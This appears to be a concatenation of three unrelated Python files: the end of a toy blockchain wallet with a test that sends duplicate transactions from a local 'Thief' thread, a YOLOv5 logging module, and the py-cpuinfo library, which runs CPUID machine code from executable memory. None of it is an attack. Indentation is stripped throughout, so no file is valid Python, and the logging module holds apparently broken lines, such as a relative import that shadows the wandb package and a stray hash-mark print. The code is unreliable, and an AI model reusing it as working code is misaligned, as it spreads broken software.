except:
head_blocks = TxBlock.loadBlocks("GenesisBlock.dat")
try:
fp = open("tx_index.dat","rb")
tx_index = pickle.load(fp)
fp.close()
except:
tx_index = {}
server = SocketUtils.newServerConnection('localhost',5006)
while not break_now:
newBlock = SocketUtils.recvObj(server)
if isinstance(newBlock,TxBlock.TxBlock):
TxBlock.processNewBlock(newBlock,head_blocks)
server.close()
TxBlock.saveBlocks(head_blocks, "AllBlocks.dat")
fp = open("tx_index.dat","wb")
pickle.dump(tx_index,fp)
fp.close()
return True
def getBalance(pu_key):
long_chain = TxBlock.findLongestBlockchain(head_blocks)
return TxBlock.getBalance(pu_key,long_chain)
def sendCoins(pu_send, amt_send, pr_send, pu_recv, amt_recv):
global tx_index
newTx = Transactions.Tx()
if not pu_send in tx_index:
tx_index[pu_send]=0
newTx.add_input(pu_send, amt_send, tx_index[pu_send])
newTx.add_output(pu_recv, amt_recv)
newTx.sign(pr_send)
for ip,port in miners:
SocketUtils.sendObj(ip,newTx,port)
tx_index[pu_send] = tx_index[pu_send] + 1
return True
def WalletStart():
#Load head_blocks, private and public keys
#Load miner list
#TODO load address book
#Start walletServer
return True
def WalletStop():
#Save head_blocks
#Close threads
return True
if __name__ == "__main__":
import time
import Miner
import threading
import Signatures
def Thief(my_addr):
my_ip, my_port = my_addr
server = SocketUtils.newServerConnection(my_ip,my_port)
# Get Txs from wallets
while not break_now:
newTx = SocketUtils.recvObj(server)
if isinstance(newTx,Transactions.Tx):
for ip,port in miners:
if not (ip==my_ip and port == my_port):
SocketUtils.sendObj(ip,newTx,port)
Miner.saveTxList([],"Txs.dat")
miner_pr, miner_pu = Signatures.generate_keys()
t1 = threading.Thread(target=Miner.minerServer, args=(('localhost',5005),))
t2 = threading.Thread(target=Miner.nonceFinder, args=(wallets, miner_pu))
t3 = threading.Thread(target=walletServer, args=(('localhost',5006),))
t1.start()
t3.start()
pr1,pu1 = Signatures.loadKeys("private.key","public.key")
pr2,pu2 = Signatures.generate_keys()
pr3,pu3 = Signatures.generate_keys()
#Query balances
bal1 = getBalance(pu1)
print(bal1)
bal2 = getBalance(pu2)
bal3 = getBalance(pu3)
#Send coins
sendCoins(pu1, 0.1, pr1, pu2, 0.1)
sendCoins(pu1, 0.1, pr1, pu2, 0.1)
sendCoins(pu1, 0.1, pr1, pu2, 0.1)
sendCoins(pu1, 0.1, pr1, pu2, 0.1)
sendCoins(pu1, 0.1, pr1, pu2, 0.1)
sendCoins(pu1, 0.1, pr1, pu2, 0.1)
sendCoins(pu1, 0.1, pr1, pu2, 0.1)
sendCoins(pu1, 0.1, pr1, pu2, 0.1)
sendCoins(pu1, 0.1, pr1, pu2, 0.1)
sendCoins(pu1, 0.1, pr1, pu2, 0.1)
sendCoins(pu1, 0.1, pr1, pu3, 0.03)
sendCoins(pu1, 0.1, pr1, pu3, 0.03)
sendCoins(pu1, 0.1, pr1, pu3, 0.03)
sendCoins(pu1, 0.1, pr1, pu3, 0.03)
sendCoins(pu1, 0.1, pr1, pu3, 0.03)
sendCoins(pu1, 0.1, pr1, pu3, 0.03)
sendCoins(pu1, 0.1, pr1, pu3, 0.03)
sendCoins(pu1, 0.1, pr1, pu3, 0.03)
sendCoins(pu1, 0.1, pr1, pu3, 0.03)
sendCoins(pu1, 0.1, pr1, pu3, 0.03)
t2.start()
time.sleep(60)
#Save/Load all blocks
TxBlock.saveBlocks(head_blocks, "AllBlocks.dat")
head_blocks = TxBlock.loadBlocks("AllBlocks.dat")
#Query balances
new1 = getBalance(pu1)
print(new1)
new2 = getBalance(pu2)
new3 = getBalance(pu3)
#Verify balances
if abs(new1-bal1+2.0) > 0.00000001:
print("Error! Wrong balance for pu1")
else:
print("Success. Good balance for pu1")
if abs(new2-bal2-1.0) > 0.00000001:
print("Error! Wrong balance for pu2")
else:
print("Success. Good balance for pu2")
if abs(new3-bal3-0.3) > 0.00000001:
print("Error! Wrong balance for pu3")
else:
print("Success. Good balance for pu3")
#Thief will try to duplicate transactions
miners.append(('localhost',5007))
t4 = threading.Thread(target=Thief,args=(('localhost',5007),))
t4.start()
sendCoins(pu2,0.2,pr2,pu1,0.2)
time.sleep(20)
#Check balances
newnew1 = getBalance(pu1)
print(newnew1)
if abs(newnew1 - new1 - 0.2) > 0.000000001:
print("Error! Duplicate Txs accepted.")
else:
print("Success! Duplicate Txs rejected.")
Miner.StopAll()
t1.join()
t2.join()
num_heads = len(head_blocks)
minus_two = head_blocks[0].previousBlock.previousBlock
newB = TxBlock.TxBlock(minus_two)
newB.previousBlock = None
SocketUtils.sendObj('localhost',newB,5006)
time.sleep(4)
if len(head_blocks) != num_heads + 1:
print("Error! Branch block should be head")
if head_blocks[-1].previousBlock != minus_two:
print("Error! Branch block has wrong parent")
StopAll()
t3.join()
print ("Exit successful.")
|
__init__.py | # YOLOv5 experiment logging utils
import warnings
from threading import Thread
import torch
from torch.utils.tensorboard import SummaryWriter
from ...utils.general import colorstr, emojis
from ...utils.loggers.wandb.wandb_utils import WandbLogger
from ...utils.plots import plot_images, plot_results
from ...utils.torch_utils import de_parallel
LOGGERS = ('csv', 'tb', 'wandb') # text-file, TensorBoard, Weights & Biases
try:
import wandb
from . import wandb
assert hasattr(wandb, '__version__') # verify package import not local dir
except (ImportError, AssertionError):
print('###############################################################3')
wandb = None
class Loggers():
# YOLOv5 Loggers class
def __init__(self, save_dir=None, weights=None, opt=None, hyp=None, data_dict=None, logger=None, include=LOGGERS):
self.save_dir = save_dir
self.weights = weights
self.opt = opt
self.hyp = hyp
self.data_dict = data_dict
self.logger = logger # for printing results to console
self.include = include
for k in LOGGERS:
setattr(self, k, None) # init empty logger dictionary
def start(self):
self.csv = True # always log to csv
# Message
try:
import wandb
from . import wandb
except ImportError:
prefix = colorstr('Weights & Biases: ')
s = f"{prefix}run 'pip install wandb' to automatically track and visualize YOLOv5 🚀 runs (RECOMMENDED)"
print(emojis(s))
# TensorBoard
s = self.save_dir
if 'tb' in self.include and not self.opt.evolve:
prefix = colorstr('TensorBoard: ')
self.logger.info(f"{prefix}Start with 'tensorboard --logdir {s.parent}', view at http://localhost:6006/")
self.tb = SummaryWriter(str(s))
# W&B
try:
assert 'wandb' in self.include and wandb
run_id = torch.load(self.weights).get('wandb_id') if self.opt.resume else None
self.opt.hyp = self.hyp # add hyperparameters
self.wandb = WandbLogger(self.opt, s.stem, run_id, self.data_dict)
except:
self.wandb = None
return self
def on_train_batch_end(self, ni, model, imgs, targets, paths, plots):
from wandb import Image
# Callback runs on train batch end
if plots:
if ni == 0:
with warnings.catch_warnings():
warnings.simplefilter('ignore') # suppress jit trace warning
self.tb.add_graph(torch.jit.trace(de_parallel(model), imgs[0:1], strict=False), [])
if ni < 3:
f = self.save_dir / f'train_batch{ni}.jpg' # filename
Thread(target=plot_images, args=(imgs, targets, paths, f), daemon=True).start()
if self.wandb and ni == 10:
files = sorted(self.save_dir.glob('train*.jpg'))
self.wandb.log({'Mosaics': [Image(str(f), caption=f.name) for f in files if f.exists()]})
def on_train_epoch_end(self, epoch):
# Callback runs on train epoch end
if self.wandb:
self.wandb.current_epoch = epoch + 1
def on_val_batch_end(self, pred, predn, path, names, im):
# Callback runs on train batch end
if self.wandb:
self.wandb.val_one_image(pred, predn, path, names, im)
def on_val_end(self):
from wandb import Image
# Callback runs on val end
if self.wandb:
files = sorted(self.save_dir.glob('val*.jpg'))
self.wandb.log({"Validation": [Image(str(f), caption=f.name) for f in files]})
def on_train_val_end(self, mloss, results, lr, epoch, best_fitness, fi):
# Callback runs on val end during training
vals = list(mloss) + list(results) + lr
keys = ['train/box_loss', 'train/obj_loss', 'train/cls_loss', # train loss
'metrics/precision', 'metrics/recall', 'metrics/mAP_0.5', 'metrics/mAP_0.5:0.95', # metrics
'val/box_loss', 'val/obj_loss', 'val/cls_loss', # val loss
'x/lr0', 'x/lr1', 'x/lr2'] # params
x = {k: v for k, v in zip(keys, vals)} # dict
if self.csv:
file = self.save_dir / 'results.csv'
n = len(x) + 1 # number of cols
s = '' if file.exists() else (('%20s,' * n % tuple(['epoch'] + keys)).rstrip(',') + '\n') # add header
with open(file, 'a') as f:
f.write(s + ('%20.5g,' * n % tuple([epoch] + vals)).rstrip(',') + '\n')
if self.tb:
for k, v in x.items():
self.tb.add_scalar(k, v, epoch) # TensorBoard
if self.wandb:
self.wandb.log(x)
self.wandb.end_epoch(best_result=best_fitness == fi)
def on_model_save(self, last, epoch, final_epoch, best_fitness, fi):
# Callback runs on model save event
if self.wandb:
if ((epoch + 1) % self.opt.save_period == 0 and not final_epoch) and self.opt.save_period != -1:
self.wandb.log_model(last.parent, self.opt, epoch, fi, best_model=best_fitness == fi)
def on_train_end(self, last, best, plots):
# Callback runs on training end
from wandb import Image, log, log_artifact
if plots:
plot_results(dir=self.save_dir) # save results.png
files = ['results.png', 'confusion_matrix.png', *[f'{x}_curve.png' for x in ('F1', 'PR', 'P', 'R')]]
files = [(self.save_dir / f) for f in files if (self.save_dir / f).exists()] # filter
if self.wandb:
log({"Results": [Image(str(f), caption=f.name) for f in files]})
log_artifact(str(best if best.exists() else last), type='model',
name='run_' + self.wandb.wandb_run.id + '_model',
aliases=['latest', 'best', 'stripped'])
self.wandb.finish_run()
def log_images(self, paths):
# Log images
import wandb
from . import wandb
from wandb import Image
if self.wandb:
self.wandb.log({"Labels": [Image(str(x), caption=x.name) for x in paths]})
|
cpuinfo.py | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
# source: https://github.com/workhorsy/py-cpuinfo/blob/v4.0.0/cpuinfo/cpuinfo.py
# version: 4.0.0
# date: 2018-05-05
# Copyright (c) 2014-2018, Matthew Brennan Jones <matthew.brennan.jones@gmail.com>
# Py-cpuinfo gets CPU info with pure Python 2 & 3
# It uses the MIT License
# It is hosted at: https://github.com/workhorsy/py-cpuinfo
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
CPUINFO_VERSION = (4, 0, 0)
import os, sys
import glob
import re
import time
import platform
import multiprocessing
import ctypes
import pickle
import base64
import subprocess
try:
import _winreg as winreg
except ImportError as err:
try:
import winreg
except ImportError as err:
pass
PY2 = sys.version_info[0] == 2
# Load hacks for Windows
if platform.system().lower() == 'windows':
# Monkey patch multiprocessing's Popen to fork properly on Windows Pyinstaller
# https://github.com/pyinstaller/pyinstaller/wiki/Recipe-Multiprocessing
try:
import multiprocessing.popen_spawn_win32 as forking
except ImportError as err:
try:
import multiprocessing.popen_fork as forking
except ImportError as err:
import multiprocessing.forking as forking
class _Popen(forking.Popen):
def __init__(self, *args, **kw):
if hasattr(sys, 'frozen'):
# We have to set original _MEIPASS2 value from sys._MEIPASS
# to get --onefile mode working.
os.putenv('_MEIPASS2', sys._MEIPASS)
try:
super(_Popen, self).__init__(*args, **kw)
finally:
if hasattr(sys, 'frozen'):
# On some platforms (e.g. AIX) 'os.unsetenv()' is not
# available. In those cases we cannot delete the variable
# but only set it to the empty string. The bootloader
# can handle this case.
if hasattr(os, 'unsetenv'):
os.unsetenv('_MEIPASS2')
else:
os.putenv('_MEIPASS2', '')
forking.Popen = _Popen
class DataSource(object):
bits = platform.architecture()[0]
cpu_count = multiprocessing.cpu_count()
is_windows = platform.system().lower() == 'windows'
raw_arch_string = platform.machine()
can_cpuid = True
@staticmethod
def has_proc_cpuinfo():
return os.path.exists('/proc/cpuinfo')
@staticmethod
def has_dmesg():
return len(program_paths('dmesg')) > 0
@staticmethod
def has_var_run_dmesg_boot():
uname = platform.system().strip().strip('"').strip("'").strip().lower()
return 'linux' in uname and os.path.exists('/var/run/dmesg.boot')
@staticmethod
def has_cpufreq_info():
return len(program_paths('cpufreq-info')) > 0
@staticmethod
def has_sestatus():
return len(program_paths('sestatus')) > 0
@staticmethod
def has_sysctl():
return len(program_paths('sysctl')) > 0
@staticmethod
def has_isainfo():
return len(program_paths('isainfo')) > 0
@staticmethod
def has_kstat():
return len(program_paths('kstat')) > 0
@staticmethod
def has_sysinfo():
return len(program_paths('sysinfo')) > 0
@staticmethod
def has_lscpu():
return len(program_paths('lscpu')) > 0
@staticmethod
def has_ibm_pa_features():
return len(program_paths('lsprop')) > 0
@staticmethod
def has_wmic():
returncode, output = run_and_get_stdout(['wmic', 'os', 'get', 'Version'])
return returncode == 0 and len(output) > 0
@staticmethod
def cat_proc_cpuinfo():
return run_and_get_stdout(['cat', '/proc/cpuinfo'])
@staticmethod
def cpufreq_info():
return run_and_get_stdout(['cpufreq-info'])
@staticmethod
def sestatus_allow_execheap():
return run_and_get_stdout(['sestatus', '-b'], ['grep', '-i', '"allow_execheap"'])[1].strip().lower().endswith('on')
@staticmethod
def sestatus_allow_execmem():
return run_and_get_stdout(['sestatus', '-b'], ['grep', '-i', '"allow_execmem"'])[1].strip().lower().endswith('on')
@staticmethod
def dmesg_a():
return run_and_get_stdout(['dmesg', '-a'])
@staticmethod
def cat_var_run_dmesg_boot():
return run_and_get_stdout(['cat', '/var/run/dmesg.boot'])
@staticmethod
def sysctl_machdep_cpu_hw_cpufrequency():
return run_and_get_stdout(['sysctl', 'machdep.cpu', 'hw.cpufrequency'])
@staticmethod
def isainfo_vb():
return run_and_get_stdout(['isainfo', '-vb'])
@staticmethod
def kstat_m_cpu_info():
return run_and_get_stdout(['kstat', '-m', 'cpu_info'])
@staticmethod
def sysinfo_cpu():
return run_and_get_stdout(['sysinfo', '-cpu'])
@staticmethod
def lscpu():
return run_and_get_stdout(['lscpu'])
@staticmethod
def ibm_pa_features():
ibm_features = glob.glob('/proc/device-tree/cpus/*/ibm,pa-features')
if ibm_features:
return run_and_get_stdout(['lsprop', ibm_features[0]])
@staticmethod
def wmic_cpu():
return run_and_get_stdout(['wmic', 'cpu', 'get', 'Name,CurrentClockSpeed,L2CacheSize,L3CacheSize,Description,Caption,Manufacturer', '/format:list'])
@staticmethod
def winreg_processor_brand():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
processor_brand = winreg.QueryValueEx(key, "ProcessorNameString")[0]
winreg.CloseKey(key)
return processor_brand
@staticmethod
def winreg_vendor_id():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
vendor_id = winreg.QueryValueEx(key, "VendorIdentifier")[0]
winreg.CloseKey(key)
return vendor_id
@staticmethod
def winreg_raw_arch_string():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Control\Session Manager\Environment")
raw_arch_string = winreg.QueryValueEx(key, "PROCESSOR_ARCHITECTURE")[0]
winreg.CloseKey(key)
return raw_arch_string
@staticmethod
def winreg_hz_actual():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
hz_actual = winreg.QueryValueEx(key, "~Mhz")[0]
winreg.CloseKey(key)
hz_actual = to_hz_string(hz_actual)
return hz_actual
@staticmethod
def winreg_feature_bits():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
feature_bits = winreg.QueryValueEx(key, "FeatureSet")[0]
winreg.CloseKey(key)
return feature_bits
def obj_to_b64(thing):
a = thing
b = pickle.dumps(a)
c = base64.b64encode(b)
d = c.decode('utf8')
return d
def b64_to_obj(thing):
try:
a = base64.b64decode(thing)
b = pickle.loads(a)
return b
except:
return {}
def run_and_get_stdout(command, pipe_command=None):
if not pipe_command:
p1 = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = p1.communicate()[0]
if not PY2:
output = output.decode(encoding='UTF-8')
return p1.returncode, output
else:
p1 = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
p2 = subprocess.Popen(pipe_command, stdin=p1.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p1.stdout.close()
output = p2.communicate()[0]
if not PY2:
output = output.decode(encoding='UTF-8')
return p2.returncode, output
def program_paths(program_name):
paths = []
exts = filter(None, os.environ.get('PATHEXT', '').split(os.pathsep))
path = os.environ['PATH']
for p in os.environ['PATH'].split(os.pathsep):
p = os.path.join(p, program_name)
if os.access(p, os.X_OK):
paths.append(p)
for e in exts:
pext = p + e
if os.access(pext, os.X_OK):
paths.append(pext)
return paths
def _get_field_actual(cant_be_number, raw_string, field_names):
for line in raw_string.splitlines():
for field_name in field_names:
field_name = field_name.lower()
if ':' in line:
left, right = line.split(':', 1)
left = left.strip().lower()
right = right.strip()
if left == field_name and len(right) > 0:
if cant_be_number:
if not right.isdigit():
return right
else:
return right
return None
def _get_field(cant_be_number, raw_string, convert_to, default_value, *field_names):
retval = _get_field_actual(cant_be_number, raw_string, field_names)
# Convert the return value
if retval and convert_to:
try:
retval = convert_to(retval)
except:
retval = default_value
# Return the default if there is no return value
if retval is None:
retval = default_value
return retval
def _get_hz_string_from_brand(processor_brand):
# Just return 0 if the processor brand does not have the Hz
if not 'hz' in processor_brand.lower():
return (1, '0.0')
hz_brand = processor_brand.lower()
scale = 1
if hz_brand.endswith('mhz'):
scale = 6
elif hz_brand.endswith('ghz'):
scale = 9
if '@' in hz_brand:
hz_brand = hz_brand.split('@')[1]
else:
hz_brand = hz_brand.rsplit(None, 1)[1]
hz_brand = hz_brand.rstrip('mhz').rstrip('ghz').strip()
hz_brand = to_hz_string(hz_brand)
return (scale, hz_brand)
def to_friendly_hz(ticks, scale):
# Get the raw Hz as a string
left, right = to_raw_hz(ticks, scale)
ticks = '{0}.{1}'.format(left, right)
# Get the location of the dot, and remove said dot
dot_index = ticks.index('.')
ticks = ticks.replace('.', '')
# Get the Hz symbol and scale
symbol = "Hz"
scale = 0
if dot_index > 9:
symbol = "GHz"
scale = 9
elif dot_index > 6:
symbol = "MHz"
scale = 6
elif dot_index > 3:
symbol = "KHz"
scale = 3
# Get the Hz with the dot at the new scaled point
ticks = '{0}.{1}'.format(ticks[:-scale-1], ticks[-scale-1:])
# Format the ticks to have 4 numbers after the decimal
# and remove any superfluous zeroes.
ticks = '{0:.4f} {1}'.format(float(ticks), symbol)
ticks = ticks.rstrip('0')
return ticks
def to_raw_hz(ticks, scale):
# Scale the numbers
ticks = ticks.lstrip('0')
old_index = ticks.index('.')
ticks = ticks.replace('.', '')
ticks = ticks.ljust(scale + old_index+1, '0')
new_index = old_index + scale
ticks = '{0}.{1}'.format(ticks[:new_index], ticks[new_index:])
left, right = ticks.split('.')
left, right = int(left), int(right)
return (left, right)
def to_hz_string(ticks):
# Convert to string
ticks = '{0}'.format(ticks)
# Add decimal if missing
if '.' not in ticks:
ticks = '{0}.0'.format(ticks)
# Remove trailing zeros
ticks = ticks.rstrip('0')
# Add one trailing zero for empty right side
if ticks.endswith('.'):
ticks = '{0}0'.format(ticks)
return ticks
def to_friendly_bytes(input):
if not input:
return input
input = "{0}".format(input)
formats = {
r"^[0-9]+B$" : 'B',
r"^[0-9]+K$" : 'KB',
r"^[0-9]+M$" : 'MB',
r"^[0-9]+G$" : 'GB'
}
for pattern, friendly_size in formats.items():
if re.match(pattern, input):
return "{0} {1}".format(input[ : -1].strip(), friendly_size)
return input
def _parse_cpu_string(cpu_string):
# Get location of fields at end of string
fields_index = cpu_string.find('(', cpu_string.find('@'))
#print(fields_index)
# Processor Brand
processor_brand = cpu_string
if fields_index != -1:
processor_brand = cpu_string[0 : fields_index].strip()
#print('processor_brand: ', processor_brand)
fields = None
if fields_index != -1:
fields = cpu_string[fields_index : ]
#print('fields: ', fields)
# Hz
scale, hz_brand = _get_hz_string_from_brand(processor_brand)
# Various fields
vendor_id, stepping, model, family = (None, None, None, None)
if fields:
try:
fields = fields.rsplit('(', 1)[1].split(')')[0].split(',')
fields = [f.strip().lower() for f in fields]
fields = [f.split(':') for f in fields]
fields = [{f[0].strip() : f[1].strip()} for f in fields]
#print('fields: ', fields)
for field in fields:
name = list(field.keys())[0]
value = list(field.values())[0]
#print('name:{0}, value:{1}'.format(name, value))
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
except:
#raise
pass
return (processor_brand, hz_brand, scale, vendor_id, stepping, model, family)
def _parse_dmesg_output(output):
try:
# Get all the dmesg lines that might contain a CPU string
lines = output.split(' CPU0:')[1:] + \
output.split(' CPU1:')[1:] + \
output.split(' CPU:')[1:] + \
output.split('\nCPU0:')[1:] + \
output.split('\nCPU1:')[1:] + \
output.split('\nCPU:')[1:]
lines = [l.split('\n')[0].strip() for l in lines]
# Convert the lines to CPU strings
cpu_strings = [_parse_cpu_string(l) for l in lines]
# Find the CPU string that has the most fields
best_string = None
highest_count = 0
for cpu_string in cpu_strings:
count = sum([n is not None for n in cpu_string])
if count > highest_count:
highest_count = count
best_string = cpu_string
# If no CPU string was found, return {}
if not best_string:
return {}
processor_brand, hz_actual, scale, vendor_id, stepping, model, family = best_string
# Origin
if ' Origin=' in output:
fields = output[output.find(' Origin=') : ].split('\n')[0]
fields = fields.strip().split()
fields = [n.strip().split('=') for n in fields]
fields = [{n[0].strip().lower() : n[1].strip()} for n in fields]
#print('fields: ', fields)
for field in fields:
name = list(field.keys())[0]
value = list(field.values())[0]
#print('name:{0}, value:{1}'.format(name, value))
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
#print('FIELDS: ', (vendor_id, stepping, model, family))
# Features
flag_lines = []
for category in [' Features=', ' Features2=', ' AMD Features=', ' AMD Features2=']:
if category in output:
flag_lines.append(output.split(category)[1].split('\n')[0])
flags = []
for line in flag_lines:
line = line.split('<')[1].split('>')[0].lower()
for flag in line.split(','):
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised'] = to_friendly_hz(hz_advertised, scale)
info['hz_actual'] = to_friendly_hz(hz_actual, scale)
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised_raw'] = to_raw_hz(hz_advertised, scale)
info['hz_actual_raw'] = to_raw_hz(hz_actual, scale)
return {k: v for k, v in info.items() if v}
except:
#raise
pass
return {}
def parse_arch(raw_arch_string):
arch, bits = None, None
raw_arch_string = raw_arch_string.lower()
# X86
if re.match(r'^i\d86$|^x86$|^x86_32$|^i86pc$|^ia32$|^ia-32$|^bepc$', raw_arch_string):
arch = 'X86_32'
bits = 32
elif re.match('^x64$|^x86_64$|^x86_64t$|^i686-64$|^amd64$|^ia64$|^ia-64$', raw_arch_string):
arch = 'X86_64'
bits = 64
# ARM
elif re.match('^armv8-a|aarch64$', raw_arch_string):
arch = 'ARM_8'
bits = 64
elif re.match('^armv7$|^armv7[a-z]$|^armv7-[a-z]$|^armv6[a-z]$', raw_arch_string):
arch = 'ARM_7'
bits = 32
elif re.match('^armv8$|^armv8[a-z]$|^armv8-[a-z]$', raw_arch_string):
arch = 'ARM_8'
bits = 32
# PPC
elif re.match('^ppc32$|^prep$|^pmac$|^powermac$', raw_arch_string):
arch = 'PPC_32'
bits = 32
elif re.match('^powerpc$|^ppc64$|^ppc64le$', raw_arch_string):
arch = 'PPC_64'
bits = 64
# SPARC
elif re.match('^sparc32$|^sparc$', raw_arch_string):
arch = 'SPARC_32'
bits = 32
elif re.match('^sparc64$|^sun4u$|^sun4v$', raw_arch_string):
arch = 'SPARC_64'
bits = 64
return (arch, bits)
def is_bit_set(reg, bit):
mask = 1 << bit
is_set = reg & mask > 0
return is_set
class CPUID(object):
def __init__(self):
self.prochandle = None
# Figure out if SE Linux is on and in enforcing mode
self.is_selinux_enforcing = False
# Just return if the SE Linux Status Tool is not installed
if not DataSource.has_sestatus():
return
# Figure out if we can execute heap and execute memory
can_selinux_exec_heap = DataSource.sestatus_allow_execheap()
can_selinux_exec_memory = DataSource.sestatus_allow_execmem()
self.is_selinux_enforcing = (not can_selinux_exec_heap or not can_selinux_exec_memory)
def _asm_func(self, restype=None, argtypes=(), byte_code=[]):
byte_code = bytes.join(b'', byte_code)
address = None
if DataSource.is_windows:
# Allocate a memory segment the size of the byte code, and make it executable
size = len(byte_code)
# Alloc at least 1 page to ensure we own all pages that we want to change protection on
if size < 0x1000: size = 0x1000
MEM_COMMIT = ctypes.c_ulong(0x1000)
PAGE_READWRITE = ctypes.c_ulong(0x4)
pfnVirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
pfnVirtualAlloc.restype = ctypes.c_void_p
address = pfnVirtualAlloc(None, ctypes.c_size_t(size), MEM_COMMIT, PAGE_READWRITE)
if not address:
raise Exception("Failed to VirtualAlloc")
# Copy the byte code into the memory segment
memmove = ctypes.CFUNCTYPE(ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t)(ctypes._memmove_addr)
if memmove(address, byte_code, size) < 0:
raise Exception("Failed to memmove")
# Enable execute permissions
PAGE_EXECUTE = ctypes.c_ulong(0x10)
old_protect = ctypes.c_ulong(0)
pfnVirtualProtect = ctypes.windll.kernel32.VirtualProtect
res = pfnVirtualProtect(ctypes.c_void_p(address), ctypes.c_size_t(size), PAGE_EXECUTE, ctypes.byref(old_protect))
if not res:
raise Exception("Failed VirtualProtect")
# Flush Instruction Cache
# First, get process Handle
if not self.prochandle:
pfnGetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
pfnGetCurrentProcess.restype = ctypes.c_void_p
self.prochandle = ctypes.c_void_p(pfnGetCurrentProcess())
# Actually flush cache
res = ctypes.windll.kernel32.FlushInstructionCache(self.prochandle, ctypes.c_void_p(address), ctypes.c_size_t(size))
if not res:
raise Exception("Failed FlushInstructionCache")
else:
# Allocate a memory segment the size of the byte code
size = len(byte_code)
pfnvalloc = ctypes.pythonapi.valloc
pfnvalloc.restype = ctypes.c_void_p
address = pfnvalloc(ctypes.c_size_t(size))
if not address:
raise Exception("Failed to valloc")
# Mark the memory segment as writeable only
if not self.is_selinux_enforcing:
WRITE = 0x2
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, WRITE) < 0:
raise Exception("Failed to mprotect")
# Copy the byte code into the memory segment
if ctypes.pythonapi.memmove(ctypes.c_void_p(address), byte_code, ctypes.c_size_t(size)) < 0:
raise Exception("Failed to memmove")
# Mark the memory segment as writeable and executable only
if not self.is_selinux_enforcing:
WRITE_EXECUTE = 0x2 | 0x4
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, WRITE_EXECUTE) < 0:
raise Exception("Failed to mprotect")
# Cast the memory segment into a function
functype = ctypes.CFUNCTYPE(restype, *argtypes)
fun = functype(address)
return fun, address
def _run_asm(self, *byte_code):
# Convert the byte code into a function that returns an int
restype = ctypes.c_uint32
argtypes = ()
func, address = self._asm_func(restype, argtypes, byte_code)
# Call the byte code like a function
retval = func()
byte_code = bytes.join(b'', byte_code)
size = ctypes.c_size_t(len(byte_code))
# Free the function memory segment
if DataSource.is_windows:
MEM_RELEASE = ctypes.c_ulong(0x8000)
ctypes.windll.kernel32.VirtualFree(ctypes.c_void_p(address), ctypes.c_size_t(0), MEM_RELEASE)
else:
# Remove the executable tag on the memory
READ_WRITE = 0x1 | 0x2
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, READ_WRITE) < 0:
raise Exception("Failed to mprotect")
ctypes.pythonapi.free(ctypes.c_void_p(address))
return retval
# FIXME: We should not have to use different instructions to
# set eax to 0 or 1, on 32bit and 64bit machines.
def _zero_eax(self):
return (
b"\x31\xC0" # xor eax,eax
)
def _zero_ecx(self):
return (
b"\x31\xC9" # xor ecx,ecx
)
def _one_eax(self):
return (
b"\xB8\x01\x00\x00\x00" # mov eax,0x1"
)
# http://en.wikipedia.org/wiki/CPUID#EAX.3D0:_Get_vendor_ID
def get_vendor_id(self):
# EBX
ebx = self._run_asm(
self._zero_eax(),
b"\x0F\xA2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
self._zero_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
self._zero_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Each 4bits is a ascii letter in the name
vendor_id = []
for reg in [ebx, edx, ecx]:
for n in [0, 8, 16, 24]:
vendor_id.append(chr((reg >> n) & 0xFF))
vendor_id = ''.join(vendor_id)
return vendor_id
